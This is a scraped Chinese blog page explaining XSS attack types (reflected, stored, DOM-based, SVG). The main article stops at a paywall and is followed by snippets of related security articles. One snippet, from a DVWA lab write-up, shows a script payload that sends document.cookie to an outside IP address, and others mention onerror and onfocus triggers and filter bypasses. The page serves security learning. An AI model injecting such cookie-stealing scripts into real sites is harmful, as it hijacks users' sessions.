XSS攻击(反射型、存储型、dom型、PDF、SWF、SVG)

已于 2025-04-15 17:19:48 修改
阅读量627 收藏 2
点赞数 12
CC 4.0 BY-SA版权
文章标签: xss 前端
于 2025-04-14 16:26:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46013320/article/details/147224580

一、XSS攻击是什么

XSS是恶意攻击者往 Web 页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中 Web 里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。

二、XSS分类

  • 反射型XSS
    常见情况是攻击者通过构造一个恶意链接的形式,诱导用户传播和打开, 由于链接内所携带的参数会回显于页面中或作为页面的处理数据源,最终造成XSS攻击。 在这里插入图片描述
  • 存储型XSS
    存储型XSS是持久化的XSS攻击方式,将恶意代码存储于服务器端, 当其他用户再次访问页面时触发,造成XSS攻击。
    在这里插入图片描述
  • dom型XSS
    dom型XSS和反射型XSS类似,都是通过构造一个恶意链接的形式,诱导用户传播和打开,但是操作的对象是dom文档
    在这里插入图片描述
  • SVGXSS
    SVG(Scalable Vector Graphics)是一种基于XML的二维矢量图格式,和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。为什么这样的SVG图片会造成跨站脚本问题呢?
    这是因为SVG是支持通过脚本语言来动态访问和修改SVG的任何内容,这点和HTML中的DOM类似,或者说完全一致。因为SVG中的所有标签和属性都
最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS高级 svg 复现一个循环问题以及两个循环问题
ikta的博客
08-06 1106
再走一步,走到img了,显示打印alert(1)但还没弹窗,很明显js把dom树阻塞了,js执行完毕,img才开始执行,意味着img标签逃不过js的过滤。下面是remove,把src属性移除掉,onerror属性向前移一位,然后索引因为没有下一位了,所以循环结束,onerror属性也就留了下来。关键的是去看img中的attributes,有两个属性,一个src,一个onerror,看上去像数组一样的一个东西,有索引0和索引1。可以很明显的看到,最外层的是svg0,除了外层,里面的是svg2和svg1。...
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1596
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射型、只决定于输出地方 在反射型XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
Web攻防-XSS跨站&文件类&功能逻辑&SVG&PDF&SWF&HTML&XML&PMessage&LocalStorage
最新发布
SuperherRo的博客
06-16 779
知识点: 1、Web攻防-XSS跨站-文件类-html&pdf&swf&svg&xml 2、Web攻防-XSS跨站-功能逻辑-postMessage&localStorage
XSS总结
2301_79469341的博客
03-14 901
XSS(Cross-Site Scripting,跨站脚本攻击)是一种经典的网络攻击技术,攻击者通过注入恶意代码,使其在用户的浏览器中执行,从而窃取敏感信息、控制用户会话或劫持网页行为。属于非持久,触发点在url参数里,提交数据到服务器,服务器返回给浏览器,需手动发给用户,用户点击之后触发js代码。指的是当图片加载不出来的时候会触发js函数,因为这里src指的是666,而不是图片地址,就会触发alert函数。换一个支持flash插件的浏览器,使用前面的payload,但是由于有实体化函数,无法闭合。
渗透实战PortSwigger Labs指南:自定义标签XSSSVG XSS利用
ericalezl的博客
06-09 337
先输入一些标签测试,说是全部标签都被禁了除了自定义的自定义onfocus当元素获得焦点时(如通过点击或键盘导航),触发,弹窗显示当前页面的Cookie信息。id=x为元素分配唯一标识符,便于JavaScript或CSS操作。tabindex=1使元素可通过键盘Tab键聚焦,从而更容易触发onfocus事件。最后加个#x#是聚焦到对应的元素。
XSS SVG
火柴人的博客
10-11 671
https://mp.weixin.qq.com/s/AOTaXjN73zvvwLhCAueMaQ?tdsourcetag=s_pctim_aiomsg
利用SVG进行XSS和XXE
热门推荐
weixin_50464560的博客
03-30 1万+
最近我学习了一些新的xss技巧在这里分享给大家! 0x01 JavaScript without parentheses using DOMMatrix 背景 以前我们有两个解决xss不带括号的方法但是都有缺陷: 我们可以使用location=name来加载外部的代码,但是Safari不支持,另外还可以用οnerrοr=alert;throw 1来实现xss,但是现在大多数的waf都会过滤throw 1,因此今天我们就来介绍以下第三种方法。 DOMMatrix 题目的伪代码: 根据上面的要求我们不能使用"’
浅谈SVG的两个黑魔法
蚁景网安学院
11-25 2225
之前在CTF比赛中遇到了一些关于SVG造成的安全问题,多亏诸多师傅的题目给我的一顿痛打让我又了解了不少新的知识和SVG在WEB安全中的应用,拓展了我的攻击面。
svgxss
'123'\x22
11-19 392
DOMXSS1
08-08
这种攻击方式不同于传统的存储XSS反射型XSS,它不需要服务器端的参与,攻击者可以直接在客户端inject恶意脚本。 DOMXSS攻击方式 攻击者可以通过多种方式inject恶意脚本到网页中,例如: 1. 通过...
ourphp 站内信存储xss漏洞1
08-04
存储XSS漏洞是指攻击者将恶意代码存储在服务器上,而不是反射到用户浏览器上,这使得攻击者可以在服务器上存储恶意代码,以便日后攻击其他用户。在OurPHP 1.7.1版本中,站内信存储XSS漏洞就存在于站内信模块中。...
xss.svg
10-27
xss
【安全牛学习笔记】反射型XSS攻击漏洞的原理及解决办法
edu_aqniu的博客
10-23 1万+
发射XSS 漏洞的原理及修复方法 1.常见的触发场景 2.漏洞原理 3.漏洞危害 4.一些tips 5.如何避免&修复漏洞 直接将用户数据输出到浏览器,没有做安全处理 搜索: www-data@:~/controller$ vim searchController.class.php class secrchController
SVG格式进行xss与xxe
yggcwhat
08-14 2054
SVG格式进行xss与xxe
xss漏洞-svg标签】详解svg标签+触发XSS
06-29 8463
svg标签的触发与实战】
XSS练习---一次循环和两次循环问题
qq_52016943的博客
08-02 377
XSS
SVG绕过浏览器XSS审计
weixin_30580943的博客
02-28 376
[Translated From]:http://insert-script.blogspot.com/2014/02/svg-fun-time-firefox-svg-vector.html====================== SVG - <use> element ====================== SVG中的<use>元素用于重用其他元素,主要...
XSS技巧拓展】————10、Chrome XSS Auditor – SVG Bypass
Fly_鹏程万里
01-21 1020
More than an year ago, in my private twitter account Brutal Secrets, I shared an interesting way to bypass Google’s Chrome anti-XSS filter called XSS Auditor. We will see now in details, from a blackb...
反射型XSS中获取flag
03-28
反射型XSS攻击中获取Flag,通常需要利用恶意脚本窃取敏感信息(如Cookie、本地存储数据)或触发特定行为。以下是具体步骤和原理: --- #### **1. 构造恶意Payload** 通过注入JavaScript代码实现信息窃取。例如:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值